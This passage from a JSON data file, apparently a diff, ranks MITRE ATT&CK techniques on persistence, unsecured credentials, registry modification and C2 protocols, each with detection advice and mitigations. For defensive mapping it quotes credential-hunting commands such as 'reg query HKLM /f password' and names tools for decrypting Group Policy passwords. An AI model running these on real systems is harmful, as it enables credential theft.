etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1547.010", + "name": "Boot or Logon Autostart Execution: Port Monitors", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \nThe Registry key contains entries for the following:\n
    \n
  • Local Port
    • \n
  • Standard TCP/IP Port
    • \n
  • USB Monitor
    • \n
  • WSD Port
    • \n
\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", + "url": "https://attack.mitre.org/techniques/T1547/010", + "detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)", + "mitigations": [] + }, + { + "tid": "T1547.011", + "name": "Boot or Logon Autostart Execution: Plist Modification", + "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)", + "url": "https://attack.mitre.org/techniques/T1547/011", + "detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\nIdentify new services executed from plist modified in the previous user's session. ", + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ] + }, + { + "tid": "T1547.012", + "name": "Boot or Logon Autostart Execution: Print Processors", + "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. \nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\[Windows architecture: e.g., Windows x64]\\Print Processors\\[user defined]\\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", + "url": "https://attack.mitre.org/techniques/T1547/012", + "detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\[Windows architecture]\\Print Processors\\[user defined]\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\[Windows architecture]\\Print Processors\\[user defined]\\Driver as they pertain to print processor installations.\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1547.013", + "name": "Boot or Logon Autostart Execution: XDG Autostart Entries", + "description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\nWithin an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use Masquerading to make XDG autostart entries look as if they are associated with legitimate programs.", + "url": "https://attack.mitre.org/techniques/T1547/013", + "detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + } + ] + }, + { + "tid": "T1547.014", + "name": "Boot or Logon Autostart Execution: Active Setup", + "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\nAdversaries may abuse Active Setup by creating a key under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.", + "url": "https://attack.mitre.org/techniques/T1547/014", + "detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.", + "mitigations": [] + }, + { + "tid": "T1547.015", + "name": "Boot or Logon Autostart Execution: Login Items", + "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\nAdversaries can utilize AppleScript and Native API calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using AppleScript to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)", + "url": "https://attack.mitre.org/techniques/T1547/015", + "detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.", + "mitigations": [] + } + ] + }, + { + "rank": 22, + "tid": "T1552", + "name": "Unsecured Credentials", + "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Bash History), operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. Private Keys).", + "url": "https://attack.mitre.org/techniques/T1552", + "detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Valid Accounts for more information.\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\nAdditionally, monitor processes for applications that can be used to query the Registry, such as Reg, and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "score": 1.6179315897971427, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [ + { + "tid": "T1552.001", + "name": "Unsecured Credentials: Credentials In Files", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\nIt is possible to extract passwords from backups or saved virtual machines through OS Credential Dumping. (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)", + "url": "https://attack.mitre.org/techniques/T1552/001", + "detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See Valid Accounts for more information.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1552.002", + "name": "Unsecured Credentials: Credentials in Registry", + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n
    \n
  • Local Machine Hive: reg query HKLM /f password /t REG_SZ /s
    • \n
  • Current User Hive: reg query HKCU /f password /t REG_SZ /s
    • \n
", + "url": "https://attack.mitre.org/techniques/T1552/002", + "detection": "Monitor processes for applications that can be used to query the Registry, such as Reg, and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1552.003", + "name": "Unsecured Credentials: Bash History", + "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)", + "url": "https://attack.mitre.org/techniques/T1552/003", + "detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1552.004", + "name": "Unsecured Credentials: Private Keys", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\nSome private keys require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.", + "url": "https://attack.mitre.org/techniques/T1552/004", + "detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1552.005", + "name": "Unsecured Credentials: Cloud Instance Metadata API", + "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.", + "url": "https://attack.mitre.org/techniques/T1552/005", + "detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\nIt may be possible to detect adversary use of credentials they have obtained such as in Valid Accounts.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1552.006", + "name": "Unsecured Credentials: Group Policy Preferences", + "description": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)\nThese group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n
    \n
  • Metasploit’s post exploitation module: post/windows/gather/credentials/gpp
    • \n
  • Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)
    • \n
  • gpprefdecrypt.py
    • \n
\nOn the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: dir /s * .xml", + "url": "https://attack.mitre.org/techniques/T1552/006", + "detection": "Monitor for attempts to access SYSVOL that involve searching for XML files. \nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)", + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ] + }, + { + "tid": "T1552.007", + "name": "Unsecured Credentials: Container API", + "description": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)\nAn adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components. ", + "url": "https://attack.mitre.org/techniques/T1552/007", + "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.\nIt may be possible to detect adversary use of credentials they have obtained such as in Valid Accounts.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + } + ] + } + ] + }, + { + "rank": 23, + "tid": "T1095", + "name": "Non-Application Layer Protocol", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)\n Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", + "url": "https://attack.mitre.org/techniques/T1095", + "detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", + "score": 1.6023809523809522, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [] + }, + { + "rank": 24, + "tid": "T1112", + "name": "Modify Registry", + "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication.", + "url": "https://attack.mitre.org/techniques/T1112", + "detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).", + "score": 1.5761904761904761, + "process_score": 0.2, + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ], + "subtechniques": [] + }, + { + "rank": 25, + "tid": "T1074", + "name": "Data Staged", + "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and 